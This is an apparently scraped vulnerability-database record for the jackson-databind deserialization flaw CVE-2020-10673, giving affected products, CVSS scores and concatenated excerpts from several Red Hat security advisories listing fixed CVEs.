undertow (CVE-2019-9511 CVE-2020-1757 CVE-2019-14888 CVE-2020-1745)
-
santuario (CVE-2019-12400)
-
apache-commons-beanutils (CVE-2019-10086)
-
cxf (CVE-2019-17573)
-
apache-commons-configuration (CVE-2020-1953)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "ucosminexus application server",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": null,
"trust": 1.6,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.0.0"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.6.7.4"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "ucosminexus service architect",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"_id": null,
"model": "ucosminexus application server-r",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "jackson-databind",
"scope": null,
"trust": 0.8,
"vendor": "fasterxml",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
"db": "NVD",
"id": "CVE-2020-10673"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158884"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
}
],
"trust": 1.2
},
"cve": "CVE-2020-10673",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-10673",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-163175",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-10673",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-10673",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-10673",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2020-10673",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2020-10673",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1151",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-163175",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-10673",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163175"
},
{
"db": "VULMON",
"id": "CVE-2020-10673"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1151"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003145"
},
{
"db": "NVD",
"id": "CVE-2020-10673"
},
{
"db": "NVD",
"id": "CVE-2020-10673"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). FasterXML jackson-databind Exists in unspecified vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4 due to insecure deserialization of com.caucho.config.types.ResourceRef (caucho-quercus). A remote attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system have been applied. \n\nFor details about how to apply this update, see:\n\nhttps://access.redhat.com/articles/11258\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18793 - [GSS](7.3.z) Upgrade Hibernate ORM from 5.3.16 to 5.3.17\nJBEAP-19095 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.20 to 1.0.21\nJBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final\nJBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final\nJBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m\nJBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x\nJBEAP-19269 - [GSS](7.3.z) Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final\nJBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1\nJBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001\nJBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001\nJBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6\nJBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. \nJBEAP-19564 - [GSS](7.3.z) Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001\nJBEAP-19585 - [GSS](7.3.z) Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6\nJBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001\nJBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001\nJBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final\nJBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final\nJBEAP-19874 - [GSS](7.3.z) Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001\n\n7. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n8. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat Data Grid 7.3.7 security update\nAdvisory ID: RHSA-2020:3779-01\nProduct: Red Hat JBoss Data Grid\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3779\nIssue date: 2020-09-17\nCVE Names: CVE-2017-7658 CVE-2019-10172 CVE-2020-1695\n CVE-2020-1710 CVE-2020-1719 CVE-2020-1745\n CVE-2020-1748 CVE-2020-1757 CVE-2020-8840\n CVE-2020-9488 CVE-2020-9546 CVE-2020-9547\n CVE-2020-9548 CVE-2020-10672 CVE-2020-10673\n CVE-2020-10714 CVE-2020-10968 CVE-2020-10969\n CVE-2020-11111 CVE-2020-11112 CVE-2020-11113\n CVE-2020-11612 CVE-2020-11619 CVE-2020-11620\n====================================================================\n1. Summary:\n\nAn update for Red Hat Data Grid is now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the\nInfinispan project. \n\nThis release of Red Hat Data Grid 7.3.7 serves as a replacement for Red Hat\nData Grid 7.3.6 and includes bug fixes and enhancements, which are\ndescribed in the Release Notes, linked to in the References section of this\nerratum. \n\nSecurity Fix(es):\n\n* jetty: Incorrect header handling (CVE-2017-7658)\n\n* EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710)\n\n* undertow: AJP File Read/Inclusion Vulnerability (CVE-2020-1745)\n\n* undertow: servletPath is normalized incorrectly leading to dangerous\napplication mapping which could result in security bypass (CVE-2020-1757)\n\n* jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n(CVE-2020-8840)\n\n* jackson-databind: Serialization gadgets in shaded-hikari-config\n(CVE-2020-9546)\n\n* jackson-databind: Serialization gadgets in ibatis-sqlmap (CVE-2020-9547)\n\n* jackson-databind: Serialization gadgets in anteros-core (CVE-2020-9548)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10672)\n\n* jackson-databind: mishandles the interaction between serialization\ngadgets and typing which could result in remote command execution\n(CVE-2020-10673)\n\n* jackson-databind: Serialization gadgets in\norg.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)\n\n* jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n(CVE-2020-10969)\n\n* jackson-databind: Serialization gadgets in\norg.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)\n\n* jackson-databind: Serialization gadgets in\norg.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)\n\n* jackson-databind: Serialization gadgets in\norg.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)\n\n* jackson-databind: Serialization gadgets in org.springframework:spring-aop\n(CVE-2020-11619)\n\n* jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n(CVE-2020-11620)\n\n* jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n(CVE-2019-10172)\n\n* resteasy: Improper validation of response header in\nMediaTypeHeaderDelegate.java class (CVE-2020-1695)\n\n* Wildfly: EJBContext principal is not popped back after invoking another\nEJB using a different Security Domain (CVE-2020-1719)\n\n* Wildfly: Improper authorization issue in WildFlySecurityManager when\nusing alternative protection domain (CVE-2020-1748)\n\n* wildfly-elytron: session fixation when using FORM authentication\n(CVE-2020-10714)\n\n* netty: compression/decompression codecs don\u0027t enforce limits on buffer\nallocation sizes (CVE-2020-11612)\n\n* log4j: improper validation of certificate with host mismatch in SMTP\nappender (CVE-2020-9488)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. See\nthe download link in the References section. \n2. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. \n3. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. \n4. Restart Data Grid to ensure the changes take effect. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-7658\nhttps://access.redhat.com/security/cve/CVE-2019-10172\nhttps://access.redhat.com/security/cve/CVE-2020-1695\nhttps://access.redhat.com/security/cve/CVE-2020-1710\nhttps://access.redhat.com/security/cve/CVE-2020-1719\nhttps://access.redhat.com/security/cve/CVE-2020-1745\nhttps://access.redhat.com/security/cve/CVE-2020-1748\nhttps://access.redhat.com/security/cve/CVE-2020-1757\nhttps://access.redhat.com/security/cve/CVE-2020-8840\nhttps://access.redhat.com/security/cve/CVE-2020-9488\nhttps://access.redhat.com/security/cve/CVE-2020-9546\nhttps://access.redhat.com/security/cve/CVE-2020-9547\nhttps://access.redhat.com/security/cve/CVE-2020-9548\nhttps://access.redhat.com/security/cve/CVE-2020-10672\nhttps://access.redhat.com/security/cve/CVE-2020-10673\nhttps://access.redhat.com/security/cve/CVE-2020-10714\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11111\nhttps://access.redhat.com/security/cve/CVE-2020-11112\nhttps://access.redhat.com/security/cve/CVE-2020-11113\nhttps://access.redhat.com/security/cve/CVE-2020-11612\nhttps://access.redhat.com/security/cve/CVE-2020-11619\nhttps://access.redhat.com/security/cve/CVE-2020-11620\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product\\xdata.grid\u0026downloadType=securityPatches\u0026version=7.3\nhttps://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX2Nf/dzjgjWX9erEAQifjA/7BlSA2KK7e4RlxfRAP3Sj7xT+CRlFcOJn\nNVVI6DNpfZNtD/TJ4M5JFMP/yzKb+/FoaGVUexqiUxQBcrYsViZdfwfQ6PSwQgd8\n5GAtC0NINGYmr0y7m6sKbAwAofnmCoEjNPjpdfLG632Err4vXDT9pGx1RNIrfS0A\nqaOSuf2BjZkD9A6Azroupq/ePmRnDBW4ovWF4ES415Pa5T7N4rmoyZ3UnGrbubmm\nGisjzhBbFyjL2wM1gMtqKlf5Qdre0XQIio4YLEnK1DaS7qLS36L04UJP9rwtB/nn\naCOKZE/4Ch0gYcNlwniH4MK4Aiy/z/OGQopuhJoKFADJ3Y5lnJwCWDMjMKwWSj1G\nDvKG4uSIa8l2oxGQURThwxY1Jr7sbQTy2QXCVoyZj9oOKoGel+qJaGVFVnwsOpB7\nMB8nPAuINZ91RR7xSBLv/AyoLnXV3dI97kOyTwEhld6THIwAUWqk+V2y7M6Onlx9\nPf+whfe0ORHzeCj/UBZh2NqcuShUpjdE9aLyYyefa2VV4t+0L4XlIfnlNuL8Ja7j\nwzLJlo/u8XMktoXRrBpMWZaCzcqN1+BTuQUXNZeqfNtgFmCgJVxp6tHyHni7flQq\nP2M8FaCyQHyQ1ggSljgZ66AEdiwatYpqOxR4yUyrKmsXt9iPsX45TdA9zSKmF2Sb\nPyKX8lLP6w8=n+2X\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nSecurity Fix(es):\n\n* netty (CVE-2016-4970 CVE-2020-7238 CVE-2019-20444 CVE-2019-20445)\n\n* dom4j (CVE-2018-1000632)\n\n* elasticsearch (CVE-2018-3831)\n\n* pdfbox (CVE-2018-11797)\n\n* vertx (CVE-2018-12541)\n\n* spring-data-jpa (CVE-2019-3797)\n\n* mina-core (CVE-2019-0231)\n\n* jackson-databind (CVE-2019-12086 CVE-2019-16335 CVE-2019-14540\nCVE-2019-17267 CVE-2019-14892 CVE-2019-14893 CVE-2019-16942 CVE-2019-16943\nCVE-2019-17531 CVE-2019-20330 CVE-2020-10673 CVE-2020-10672 CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11620 CVE-2020-11619\nCVE-2020-14195 CVE-2020-14060 CVE-2020-14061 CVE-2020-14062)\n\n* jackson-mapper-asl (CVE-2019-10172)\n\n* hawtio (CVE-2019-9827)\n\n* undertow (CVE-2019-9511 CVE-2020-1757 CVE-2019-14888 CVE-2020-1745)\n\n* santuario (CVE-2019-12400)\n\n* apache-commons-beanutils (CVE-2019-10086)\n\n* cxf (CVE-2019-17573)\n\n* apache-commons-configuration (CVE-2020-1953)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation 